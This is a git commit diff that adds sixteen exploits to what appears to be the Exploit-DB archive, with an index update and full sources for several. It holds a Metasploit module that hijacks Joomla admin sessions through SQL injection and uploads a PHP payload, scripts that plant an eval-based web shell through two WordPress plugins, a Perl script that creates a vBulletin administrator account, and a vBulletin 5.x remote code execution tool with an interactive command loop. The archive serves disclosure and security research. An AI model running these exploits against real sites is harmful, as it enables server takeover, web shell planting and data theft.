DB: 2015-11-24
16 new exploits
This commit is contained in:
parent
24fd1d1765
commit
daf16b0803
17 changed files with 913 additions and 0 deletions
16
files.csv
16
files.csv
|
@ -35045,8 +35045,24 @@ id,file,description,date,author,platform,type,port
|
|||
38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
|
||||
38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
|
||||
38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
|
||||
38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-03,wantexz,php,webapps,0
|
||||
38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
|
||||
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
|
||||
38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0
|
||||
38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0
|
||||
38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
|
||||
38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-07,wantexz,php,webapps,0
|
||||
38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) 'timestamp' Parameter Directory Traversal Vulnerability",2013-10-08,"Ding Yu-Chi",php,webapps,0
|
||||
38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x '/install/upgrade.php' Security Bypass Vulnerability",2013-10-13,"Joshua Rogers",php,webapps,0
|
||||
38786,platforms/php/webapps/38786.txt,"Ziteman CMS Login Page SQL Injection Vulnerability",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability 2",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza",php,webapps,80
|
||||
38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash PoC",2015-11-23,"Antonio Z.",windows,dos,0
|
||||
38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
|
||||
38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38794,platforms/windows/dos/38794.txt,"Windows Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38796,platforms/windows/dos/38796.txt,"Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80
|
||||
|
|
Can't render this file because it is too large.
|
267
platforms/php/remote/38797.rb
Executable file
267
platforms/php/remote/38797.rb
Executable file
|
@ -0,0 +1,267 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Joomla Content History SQLi Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability found in Joomla versions
|
||||
3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
|
||||
component in the core of Joomla. Triggering the SQL injection makes it possible
|
||||
to retrieve active Super User sessions. The cookie can be used to login to the
|
||||
Joomla administrator backend. By creating a new template file containing our
|
||||
payload, remote code execution is made possible.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Asaf Orpani', # Vulnerability discovery
|
||||
'xistence <xistence[at]0x90.nl>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-7857' ], # Admin session hijacking
|
||||
[ 'CVE', '2015-7297' ], # SQLi
|
||||
[ 'CVE', '2015-7857' ], # SQLi
|
||||
[ 'CVE', '2015-7858' ], # SQLi
|
||||
[ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
|
||||
[ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
# Arbitrary big number. The payload gets sent as POST data, so
|
||||
# really it's unlimited
|
||||
'Space' => 262144, # 256k
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Joomla 3.x <= 3.4.4', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Oct 23 2015",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
# Request using a non-existing table
|
||||
res = sqli(rand_text_alphanumeric(rand(10)+6))
|
||||
|
||||
if res && res.body =~ /`(.*)_ucm_history`/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
||||
end
|
||||
|
||||
|
||||
def sqli( tableprefix )
|
||||
|
||||
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
|
||||
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
|
||||
# This way we make sure that's excluded and we only get real admin sessions.
|
||||
|
||||
sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
|
||||
|
||||
# Retrieve cookies
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "index.php"),
|
||||
'vars_get' => {
|
||||
'option' => 'com_contenthistory',
|
||||
'view' => 'history',
|
||||
'list[ordering]' => '',
|
||||
'item_id' => '1',
|
||||
'type_id' => '1',
|
||||
'list[select]' => sql
|
||||
}
|
||||
})
|
||||
|
||||
return res
|
||||
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
# Request using a non-existing table first, to retrieve the table prefix
|
||||
res = sqli(rand_text_alphanumeric(rand(10)+6))
|
||||
|
||||
if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
|
||||
table_prefix = $1
|
||||
print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
|
||||
end
|
||||
|
||||
# Retrieve the admin session using our retrieved table prefix
|
||||
res = sqli("#{table_prefix}_")
|
||||
|
||||
if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
|
||||
auth_cookie_part = $1[0...-1]
|
||||
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
|
||||
end
|
||||
|
||||
# Retrieve cookies
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php")
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
|
||||
cookie_begin = $1
|
||||
print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
|
||||
end
|
||||
|
||||
# Modify cookie to authenticated admin
|
||||
auth_cookie = cookie_begin
|
||||
auth_cookie << "="
|
||||
auth_cookie << auth_cookie_part
|
||||
auth_cookie << ";"
|
||||
|
||||
# Authenticated session
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Administration - Control Panel/
|
||||
print_status("#{peer} - Successfully authenticated as Administrator")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Session failure")
|
||||
end
|
||||
|
||||
|
||||
# Retrieve template view
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
'view' => 'templates'
|
||||
}
|
||||
})
|
||||
|
||||
# We try to retrieve and store the first template found
|
||||
if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
|
||||
template_id = $1
|
||||
file_id = $2
|
||||
else
|
||||
fail_with(Failure::Unknown, "Unable to retrieve template")
|
||||
end
|
||||
|
||||
filename = rand_text_alphanumeric(rand(10)+6)
|
||||
|
||||
# Create file
|
||||
print_status("#{peer} - Creating file [ #{filename}.php ]")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
'task' => 'template.createFile',
|
||||
'id' => template_id,
|
||||
'file' => file_id,
|
||||
},
|
||||
'vars_post' => {
|
||||
'type' => 'php',
|
||||
'name' => filename
|
||||
}
|
||||
})
|
||||
|
||||
# Grab token
|
||||
if res && res.code == 303 && res.headers['Location']
|
||||
location = res.headers['Location']
|
||||
print_status("#{peer} - Following redirect to [ #{location} ]")
|
||||
res = send_request_cgi(
|
||||
'uri' => location,
|
||||
'method' => 'GET',
|
||||
'cookie' => auth_cookie
|
||||
)
|
||||
|
||||
# Retrieving template token
|
||||
if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
|
||||
token = $1
|
||||
print_status("#{peer} - Token [ #{token} ] retrieved")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
|
||||
end
|
||||
|
||||
if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
|
||||
template_path = $1
|
||||
print_status("#{peer} - Template path [ #{template_path} ] retrieved")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
|
||||
end
|
||||
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Creating file failed")
|
||||
end
|
||||
|
||||
filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
|
||||
|
||||
# Inject payload data into file
|
||||
print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
'view' => 'template',
|
||||
'id' => template_id,
|
||||
'file' => filename_base64,
|
||||
},
|
||||
'vars_post' => {
|
||||
'jform[source]' => payload.encoded,
|
||||
'task' => 'template.apply',
|
||||
token => '1',
|
||||
'jform[extension_id]' => template_id,
|
||||
'jform[filename]' => "/#{filename}.php"
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
|
||||
print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
|
||||
end
|
||||
|
||||
# Request payload
|
||||
register_files_for_cleanup("#{filename}.php")
|
||||
print_status("#{peer} - Executing payload")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
|
||||
'cookie' => auth_cookie
|
||||
})
|
||||
|
||||
end
|
||||
|
||||
end
|
62
platforms/php/webapps/38782.php
Executable file
62
platforms/php/webapps/38782.php
Executable file
|
@ -0,0 +1,62 @@
|
|||
source: http://www.securityfocus.com/bid/62825/info
|
||||
|
||||
The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
|
||||
|
||||
<?php
|
||||
|
||||
# seo-watcher ~ Exploit
|
||||
# http://indonesiancoder.com/
|
||||
|
||||
|
||||
echo <<<EOT
|
||||
|
||||
|
||||
EOT;
|
||||
|
||||
|
||||
$options = getopt('u:f:');
|
||||
|
||||
if(!isset($options['u'], $options['f']))
|
||||
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
|
||||
-u http://target.com/ The full path to Joomla!
|
||||
-f shell.php The name of the file to create.\n");
|
||||
|
||||
$url = $options['u'];
|
||||
$file = $options['f'];
|
||||
|
||||
|
||||
$shell = "{$url}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}";
|
||||
$url = "{$url}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}";
|
||||
|
||||
$data = "<?php eval(\$_GET['cmd']); ?>";
|
||||
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
|
||||
'Content-Type: text/plain');
|
||||
|
||||
|
||||
echo " [+] Submitting request to: {$options['u']}\n";
|
||||
|
||||
|
||||
$handle = curl_init();
|
||||
|
||||
curl_setopt($handle, CURLOPT_URL, $url);
|
||||
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
|
||||
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
|
||||
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
|
||||
|
||||
$source = curl_exec($handle);
|
||||
curl_close($handle);
|
||||
|
||||
|
||||
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
|
||||
{
|
||||
echo " [+] Exploit completed successfully!\n";
|
||||
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
die(" [+] Exploit was unsuccessful.\n");
|
||||
}
|
||||
|
||||
?>
|
64
platforms/php/webapps/38783.php
Executable file
64
platforms/php/webapps/38783.php
Executable file
|
@ -0,0 +1,64 @@
|
|||
source: http://www.securityfocus.com/bid/62876/info
|
||||
|
||||
The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
|
||||
|
||||
<?php
|
||||
|
||||
# woopra plugins ~ Exploit
|
||||
# http://indonesiancoder.com/
|
||||
#
|
||||
|
||||
echo <<<EOT
|
||||
|
||||
EOT;
|
||||
|
||||
|
||||
$options = getopt('u:f:');
|
||||
|
||||
if(!isset($options['u'], $options['f']))
|
||||
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
|
||||
-u http://target.com/ The full path to Joomla!
|
||||
-f shell.php The name of the file to create.\n");
|
||||
|
||||
$url = $options['u'];
|
||||
$file = $options['f'];
|
||||
|
||||
|
||||
$shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
|
||||
$url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
|
||||
|
||||
$data = "<?php eval(\$_GET['cmd']); ?>";
|
||||
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
|
||||
rv:15.0) Gecko/20100101 Firefox/15.0.1',
|
||||
'Content-Type: text/plain');
|
||||
|
||||
|
||||
echo " [+] Submitting request to: {$options['u']}\n";
|
||||
|
||||
|
||||
$handle = curl_init();
|
||||
|
||||
curl_setopt($handle, CURLOPT_URL, $url);
|
||||
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
|
||||
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
|
||||
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
|
||||
|
||||
$source = curl_exec($handle);
|
||||
curl_close($handle);
|
||||
|
||||
|
||||
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') &&
|
||||
@fopen($shell, 'r'))
|
||||
{
|
||||
echo " [+] Exploit completed successfully!\n";
|
||||
echo " ______________________________________________\n\n
|
||||
{$shell}?cmd=system('id');\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
die(" [+] Exploit was unsuccessful.\n");
|
||||
}
|
||||
|
||||
?>
|
9
platforms/php/webapps/38784.txt
Executable file
9
platforms/php/webapps/38784.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/62899/info
|
||||
|
||||
Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
|
||||
|
||||
Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim
|
142
platforms/php/webapps/38785.pl
Executable file
142
platforms/php/webapps/38785.pl
Executable file
|
@ -0,0 +1,142 @@
|
|||
source: http://www.securityfocus.com/bid/62909/info
|
||||
|
||||
vBulletin is prone to a security-bypass vulnerability.
|
||||
|
||||
Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions.
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Title: vBulletin remote admin injection exploit
|
||||
# Author: Simo Ben youssef
|
||||
# Contact: Simo_at_Morxploit_com
|
||||
# Coded: 17 September 2013
|
||||
# Published: 24 October 2013
|
||||
# MorXploit Research
|
||||
# http://www.MorXploit.com
|
||||
#
|
||||
# Vendor: vBulletin (www.vbulletin.com)
|
||||
# Version: 4.1.x / 5.x.x
|
||||
# Vulnerability: Remote admin injection
|
||||
# Severity: High
|
||||
# Status: Confirmed
|
||||
#
|
||||
# Exploit code description:
|
||||
# Perl code to inject a new admin account through upgrade.php script.
|
||||
#
|
||||
# Vulnerability details:
|
||||
# upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading
|
||||
# it only requires the customer number which can be extracted through the same script source code.
|
||||
#
|
||||
# Fix:
|
||||
# Rename or delete the install folder until a fix is released.
|
||||
#
|
||||
# Author disclaimer:
|
||||
# The information contained in this entire document is for educational, demonstration and testing purposes only.
|
||||
# Author cannot be held responsible for any malicious use. Use at your own risk.
|
||||
#
|
||||
# Exploit usage:
|
||||
#
|
||||
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
|
||||
#
|
||||
# ===================================================
|
||||
# --- vbulletin admin injection exploit
|
||||
# --- By: Simo Ben youssef <simo_at_morxploit_com>
|
||||
# --- MorXploit Research www.MorXploit.com
|
||||
# ===================================================
|
||||
# [*] Trying to get customer number ... hold on!
|
||||
# [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
|
||||
# [*] Trying to MorXploit localhost ... hold on!
|
||||
# [+] Admin account successfully injected!
|
||||
# [+] Admin: MorXploit
|
||||
# [+] Pass: m0rxpl017
|
||||
|
||||
use strict;
|
||||
use IO::Socket;
|
||||
|
||||
if(!defined($ARGV[0])) {
|
||||
|
||||
system ('clear');
|
||||
print "\n";
|
||||
print "===================================================\n";
|
||||
print "--- vbulletin admin injection exploit\n";
|
||||
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
|
||||
print "--- MorXploit Research www.MorXploit.com\n";
|
||||
print "===================================================\n";
|
||||
|
||||
print "--- Usage: perl $0 target\n\n";
|
||||
exit; }
|
||||
|
||||
my $site = $ARGV[0];
|
||||
|
||||
##### Change these as needed #####
|
||||
my $user = "MorXploit";
|
||||
my $passwd = "m0rxpl017";
|
||||
my $email = "dev%40null.com";
|
||||
my $path = "/install/upgrade.php";
|
||||
##################################
|
||||
|
||||
my $accept = "Accept: */*";
|
||||
my $ct = "application/x-www-form-urlencoded";
|
||||
my $port = "80";
|
||||
|
||||
system ('clear');
|
||||
print "\n";
|
||||
print "===================================================\n";
|
||||
print "--- vbulletin admin injection exploit\n";
|
||||
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
|
||||
print "--- MorXploit Research www.MorXploit.com\n";
|
||||
print "===================================================\n";
|
||||
|
||||
my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
|
||||
|
||||
print "[*] Trying to get customer number ... hold on!\n";
|
||||
|
||||
print $sock "GET $path HTTP/1.1\n";
|
||||
print $sock "Host: $site\n";
|
||||
print $sock "$accept\n";
|
||||
print $sock "Content-Type: $ct\n";
|
||||
print $sock "Connection: Close\n\n";
|
||||
|
||||
my $gotcn;
|
||||
while(my $cn = <$sock>) {
|
||||
if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
|
||||
$gotcn = $1;
|
||||
}
|
||||
}
|
||||
|
||||
if (!defined $gotcn) {
|
||||
print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
|
||||
}
|
||||
else {
|
||||
print "[+] Got $gotcn!\n";
|
||||
}
|
||||
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
|
||||
&only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
|
||||
htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
|
||||
a[confirmpassword]=$passwd&htmldata[email]=$email";
|
||||
my $cl = length($xploit);
|
||||
my $content = "Content-Length: $cl";
|
||||
|
||||
my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
|
||||
|
||||
print "[*] Trying to MorXploit $site ... hold on!\n";
|
||||
|
||||
print $sock2 "POST $path HTTP/1.1\n";
|
||||
print $sock2 "Host: $site\n";
|
||||
print $sock2 "$accept\n";
|
||||
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
|
||||
print $sock2 "Content-Length: $cl\n";
|
||||
print $sock2 "Content-Type: $ct\n";
|
||||
print $sock2 "Connection: Close\n\n";
|
||||
print $sock2 "$xploit\n\n";
|
||||
|
||||
while(my $result = <$sock2>){
|
||||
if ($result =~ /Administrator account created/) {
|
||||
print "[+] Admin account successfully injected!\n";
|
||||
print "[+] Admin: $user\n";
|
||||
print "[+] Pass: $passwd\n";
|
||||
exit;
|
||||
}
|
||||
}
|
||||
print "[-] Failed, something went wrong\n";
|
||||
exit;
|
7
platforms/php/webapps/38786.txt
Executable file
7
platforms/php/webapps/38786.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/62949/info
|
||||
|
||||
Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/admincss/default.asp
|
47
platforms/php/webapps/38790.pl
Executable file
47
platforms/php/webapps/38790.pl
Executable file
|
@ -0,0 +1,47 @@
|
|||
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
|
||||
#[+] Product: vbulletin
|
||||
#[+] Vendor: http://vbulletin.com
|
||||
#[+] Vulnerable Version(s): Vbulletin 5.x
|
||||
#
|
||||
#
|
||||
# Author : Mohammad Reza Espargham
|
||||
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||
# Website : www.reza.es
|
||||
# Twitter : https://twitter.com/rezesp
|
||||
# FaceBook : https://www.facebook.com/reza.espargham
|
||||
# Special Thanks : Mohammad Emad
|
||||
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
||||
|
||||
use LWP::UserAgent;
|
||||
use LWP::Simple;
|
||||
$ua = LWP::UserAgent ->new;
|
||||
|
||||
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
|
||||
print "\n\n \t Enter Target : ";
|
||||
$Target=<STDIN>;
|
||||
chomp($Target);
|
||||
|
||||
|
||||
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
|
||||
|
||||
$source=$response->decoded_content;
|
||||
if (($source =~ m/4276158464/i))
|
||||
{
|
||||
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
|
||||
$user=$response->decoded_content;
|
||||
chomp($user);
|
||||
print "\n Target Vulnerable ;)\n";
|
||||
while($cmd=="exit")
|
||||
{
|
||||
print "\n\n$user\$ ";
|
||||
$cmd=<STDIN>;
|
||||
chomp($cmd);
|
||||
if($cmd =~ m/exit/i){exit 0;}
|
||||
$len=length($cmd);
|
||||
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
|
||||
print "\n".$response->decoded_content;
|
||||
|
||||
}
|
||||
}else{print "\ntarget is not Vulnerable\n\n"}
|
67
platforms/windows/dos/38787.txt
Executable file
67
platforms/windows/dos/38787.txt
Executable file
|
@ -0,0 +1,67 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Acrobat Reader DC
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Versions: 15.008.20082.15957
|
||||
|
||||
CVE: CVE-2015-7622
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).[14]
|
||||
|
||||
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. Thefreeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files.[15] Thecommercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content managementand file hosting services.
|
||||
|
||||
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2015-08-09: Francis Provencher of COSIG found the issue;
|
||||
2015-08-11: Francis Provencher of COSIG report vulnerability to PSIRT;
|
||||
2015-10-13: Adobe release a patch (APSB15-24)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
An error in the the PDF parser, could lead to a memory corruption when processing a crafted PDF with an invalid image.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
